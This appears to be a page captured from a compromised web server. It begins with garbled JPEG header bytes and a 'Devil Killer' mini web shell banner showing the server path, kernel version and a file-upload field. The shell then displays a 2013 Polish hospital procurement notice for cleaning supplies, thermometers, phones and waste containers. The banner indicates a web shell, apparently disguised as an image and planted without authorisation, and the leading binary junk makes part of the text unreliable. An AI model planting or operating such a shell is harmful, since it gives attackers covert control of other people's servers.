JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130814/329536-N-2013.html

<p class="kh_header"><b>Łódź: 69/ZP/13 - Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy sprzętu gospodarstwa domowego dla WSS im. M. Kopernika w Łodzi.</b><br>
<b>Numer ogłoszenia: 329536 - 2013; data zamieszczenia: 14.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 69/ZP/13 - Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 200 000 euro na dostawy sprzętu gospodarstwa domowego dla WSS im. M. Kopernika w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> <br />Pakiet 1: Szczotki, mopy, miski, pojemniki
<br />Pakiet 2: Urządzenia do pomiarów
<br />Pakiet 3: Pojemniki do dezynfekcji
<br />Pakiet 4: Wózki gospodarcze
<br />Pakiet 5: Telefony stacjonarne i faksy
<br />Pakiet 6: Ławki ogrodowe i kosze ogrodowe
<br />Pakiet 7: Szafki ubraniowe BHP, regały do archiwum
<br />Pakiet 8: Pojemniki na odpady, pojemniki na segregację odpadów
<br />Pakiet 9: Worki do selektywnej zbiórki odpadów
<br />Pakiet 10: Dozowniki, pojemniki, zestawy sprzątające
<br />szczegółowy opis zawiera załącznik nr 3 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiajacy nie opisuje sposobu dokonywania oceny spełniania warunków udzialu w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiajacy nie opisuje sposobu dokonywania oceny spełniania warunków udzialu w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiajacy nie opisuje sposobu dokonywania oceny spełniania warunków udzialu w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiajacy nie opisuje sposobu dokonywania oceny spełniania warunków udzialu w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiajacy nie opisuje sposobu dokonywania oceny spełniania warunków udzialu w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Załącznik nr 3 do SIWZ - Formularz ofertowo-cenowy</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca
ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których
mowa w pkt. III.4.3.1, zastępuje się je dokumentem oświadczenie, w którym
określa się także osoby uprawnione do reprezentacji wykonawcy, złożone
przed właściwym organem sądowym, administracyjnym albo organem
samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca
zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, lub przed notariuszem - wystawione z odpowiednia datą
wymagana dla tych dokumentów;
Załącznik nr 6 - podwykonawstwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004. prawo zamówień publicznych przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach:

1)	podwyższenia stawki podatku VAT przy czym zmianie ulega jedynie cena netto, cena brutto pozostaje bez zmian. Nowe stawki będą obowiązywać strony wraz z wejściem w życie przepisów je regulujących. Każdorazowa zmiana nie wymaga sporządzenia aneksu w formie pisemnej, ewentualnie strony mogą zawrzeć aneks porządkujący na wniosek Zamawiającego. W uzasadnionych wypadkach , na pisemny umotywowany wniosek Wykonawcy strony mogą zawrzeć aneks, mocą którego zdecydują o podwyższeniu ceny brutto przy pozostawieniu ceny netto bez zmian.
2)	obniżenia stawki podatku VAT przy czym zmianie ulega jedynie cena brutto cena netto pozostaje bez zmian. Nowe stawki będą obowiązywać strony wraz z wejściem w życie przepisów je regulujących. Każdorazowa zmiana nie wymaga sporządzenia aneksu w formie pisemnej, ewentualnie strony mogą zawrzeć aneks porządkujący na wniosek Zamawiającego.
3)	obniżenia cen w każdej sytuacji z inicjatywy Wykonawcy lub Zamawiającego.
4)	wprowadzenia produktu zmodyfikowanego lub udoskonalonego spełniającego parametry wymagane w SIWZ, pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż produkt objęty zamówieniem początkowym. Ewentualna zmiana produktu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie aneksu w którym dotychczasowy produkt zostanie wykreślony i zastąpiony produktem zmodyfikowanym lub udoskonalonym.
5)	wycofania produktu z produkcji. Wykonawca ma obowiązek zapewnić dostarczenie produktu zamiennego o parametrach nie gorszych od produktu objętego umową pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż produkt objęty zamówieniem początkowym;
Ewentualna zmiana produktu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie  aneksu mocą którego nastąpi wykreślenie z umowy produktu wycofanego z produkcji i zastąpienie go produktem zamiennym.
6)	zmiany ilości towaru w danej pozycji w danym pakiecie, polegającej na przesunięciu tych ilości między pozycjami, z tym, że wartość brutto całego pakietu nie może ulec zmianie. Zmiana nastąpi w formie pisemnego aneksu do umowy  pod rygorem nieważności
7)	zmiany przedmiotowej/ produkt zamienny jeśli wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu  produktu zamiennego o parametrach nie gorszych od produktu objętego umową oraz przy zachowaniu ceny jednostkowej, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności
8)	w przypadku niewyczerpania całości asortymentu określonego w Załączniku nr 1 w terminie na jaki umowa została zawarta, termin ten ulegnie przedłużeniu o kolejne 30 dni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi, ul. Pabianicka 62; 93-513, Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2013 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi, ul. Pabianicka 62; 93-513, Kancelaria szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> <br />W zakresie pakietów nr 8 i 9: 
<br />Umowy obowiązywać będą przez okres 24 miesięcy począwszy od dnia, w <br />którym ulegną rozwiązaniu, wygaśnięciu lub wyczerpaniu umowy <br />obowiązujące aktualnie, lecz nie później, niż począwszy od terminów:
<br />Pakiet 8: Pojemniki na odpady i segregacje odpadów: od dnia 22.03.2014r.
<br />Pakiet 9: Worki na odpady: od dnia 28.04.2014r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 1 - SZCZOTKI, MIOTŁY, MISKI, POJEMNIKI
1.	szczotki do podłogi 35 cm z włosiem naturalnym	szt.	60
2.	kije do szczotek z gwintem L-150	szt.	60
3.	szczotki zmiotki z szufelką zakończoną gumą	kpl.	150
4.	kije drewniane bez gwintu L-150 do mioteł	szt.	500
5.	Miotły brzozowe bez kija	szt.	1200
6.	ścierki  do  podłóg  ( białe )	szt.	2 000
7.	szczotki do WC z pojemnikiem	kpl.	300
8.	Wycieraczki  podgumowane   90 x150	szt.	60
9.	Zasłony łazienkowe z materiału 160 x 200	szt.	50
10.	Uchwyt ze ściągaczem do szyb 25-30 cm.	szt.	60
11.	Miski plast. 3 l. kolorowe	szt.	50
12.	Tace plast. 20x 15 cm,.	szt.	60
13.	Tace plast. 30 x 45cm,.	szt.	60
14.	Miska plastikowa śr. 50 cm.	szt.	20
15.	Kosze plastikowe 45 cm x 60 cm z uchwytami do przenoszenia	szt.	300
16.	Grzebienie z uchwytem długośc 25 cm, z rzadkimi zębami	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 2 - URZĄDZENIA DO POMIARÓW
1.	Termometr lodówkowy	szt.	200
2.	Termometr do pomiaru temperatury w pomieszczeniu	szt.	150
3.	Higrometr elektroniczny z rejestratorem pomiarów, sondą	kpl.	5
4.	Termohigrometr	szt.	12
5.	Termometr do żywności z sondą	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.20.00-6, 38.41.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 3 - POJEMNIKI DO DEZYNFEKCJI
1.	Pojemniki  5 l, z tworzywa sztucznego, z pokrywą, do dezynfekcji, z sitem.	szt.	20
2.	Pojemniki  10 l, z tworzywa sztucznego, z pokrywą, do dezynfekcji, z sitem.	szt.	10
3.	Pojemniki  30 l, z tworzywa sztucznego, z pokrywą, do dezynfekcji, z sitem.	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.61.30.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 4 - WÓZKI GOSPODARCZE
1.	Wózek do transportu dużych i ciężkich płyt, konstrukcja rury z trzema zabezpieczeniami przed zsunieciem się po powierzchni przeznaczonej do nakładania towarów, z dodatkowo wkomponowaną półką, na 4 kołach skrętnych z gumowymi bieżnikami (w tym dwa z hamulcem), w kierunku przesuwania się kółko stałe, przy ciągnięciu wozka kółko skrętne.	szt.	1
2.	wózek platformowy z osiatkowanymi bokami długośc 1250 mm (+/-50mm), szerokośc platformy 600 (+/-50mm),  nośność min.500kg, z dwóch stron poręcze do pchania, boki wyjmowane,konstrukcja stalowa malowana proszkowo, platforma z plyty wiórowej na 4 kołach (w tym dwa skrętne)  	szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 5 - TELEFONY STACJONARNE i FAKSY
1	 Aparat telefoniczny bezprzewodowy, z 1-słuchawka - Odbieranie połączeń dowolnym przyciskiem, Funkcja czasu i daty, Funkcja alarmu, 5 melodii / 5 tonów dzwonka, Tryb głośno-mówiący, TRYB ECO, Identyfikacja abonenta wywołującego, Podświetlany punktowy wyświetlacz LCD 1,4, Książka telefoniczna -min.  50 numerów, Lista identyfikacyjna - 50 numerów, Pamięć wybierania numerów 10, Wybieranie jednoprzyciskowe - 9 numerów, Przycisk nawigacyjny, Restrykcje połączeń, Blokada klawiatury	szt.	60
2	Fax - szybki telefax laserowy z funkcja drukarki, duża prędkośc transmisji (modem min. 14kbps, ok.8 sek./stronę), druk laserowy 600x600 dpi, prędkośc druku 14 stron/min. , pamięć na 120 stron (transmisja), 170 stron(odbiór) podajnik oryginałów do 20 stron, podajnik papieru na min.. 200 arkuszy + podstawka do odbioru na 100 arkuszy, funkcja kopiowania, tryb korekcji błędow, funkcja identyfikacji numeru przychodzącego, ksiązka telefoniczna na ok. 100 numerów, szybkie wybieranie numerow min. 20, waga do 10 kg.	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.55.21.10-1, 32.55.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 6 - ŁAWKI OGRODOWE, KOSZE OGRODOWE
1	Ławki ogrodowe metalowo drewniane, podstawa żeliwna mocowana do podłoża, długość 160 cm (+/-5cm), szerokośc ławki 50cm (+/-5 cm) wysokośc ławki 75 cm(+/- 5 cm), szerokośc siedziska 35cm(+/-5 cm), oparcie pleców na dwie deski, siedzisko na trzy deski, ławki bez poręczy bocznych, siedziska zabezpieczone przed działaniem warunków atmosferycznych.	szt.	40
2	Kosze metalowe parkowe, przenośne, pojemność 50l., wysokośc pojemnika 50 cm(+/-5 cm), szerokość: 40cm (+/-5 cm)  głębokość 40 cm (+/-5cm), kosz o mocnej konstrukcji wykonany z blachy ocynkowanej, malowany proszkowo, kosz z popielniczką.	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3, 32.55.21.10-1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 7 - SZAFKI UBRANIOWE BHP, REGAŁY DO ARCHIWUM
1.	Szafki ubraniowe BHP 2-częściowe	szt.	150
2.	Zamki do szafek BHP /do szafek z poz. 1/	szt.	25
3.	Regały do archiwum	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.13.00-5, 44.52.11.10-2, 29.13.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> pakiet 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 8 - POJEMNIKI NA ODPADY,  POJEMNIKI NA SEGREGACJĘ ODPADÓW
1.	pojemniki plastikowe o pojemności 30 litrów z pokrywa hermetyczną i dodatkowym otworem w pokrywie	szt.	200
2.	Wiadra pedałowe o poj.12 - 15 litrów z tworzywa sztucznego z pokrywą 	szt.	500
3.	Pojemnik o pojemności 50 l. z tworzywa sztucznego przeznaczony do selektywnej zbiórki odpadów, do zastosowania na zewnątrz i wewnątrz budynków, wyposażony w zaczepy, klipsy zabezpieczające oddzielenie pokrywy od kosza, z pokrywą typu push wyposażoną w system sprężynowy.  Kolory pojemników:  ZIELONY, NIEBIESKI , ŻÓŁTY ,CZERWONY   Do  każdego pojemnika nalepka określająca rodzaj odpadu  	szt.	50
4.	pojemniki na zużyte igły o poj. 2 litry żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny	szt.	24 000
5.	pojemniki na zużyte igły o poj. 1 litr żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny	szt.	20 000
6.	stojaki na worki z odpadami o wielkości 70 x 110 cm. Stojaki z pokrywą z tworzywa sztucznego przeznaczone do selektywnej zbiórki odpadów wewnątrz pomieszczeń szpitalnych na 4 kołach	szt.	20
7.	pojemniki plastikowe o pojemności  10 litrów z pokrywa hermetyczną/ i otworem w pokrywie (w kolorze żółtym lub czerwonym)	szt.	15 000
8.	pojemniki na zużyte igły o poj. 0,5 litra  żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny	szt.	2000
9.	Pojemniki z tworzywa sztucznego z uchylną pokrywą mobilne, na kółkach o pojemności 110 - 130 litrów	szt.	20
10.	Pojemniki plastikowe o poj. 60 l z pokrywą	szt.	100.</p></li>
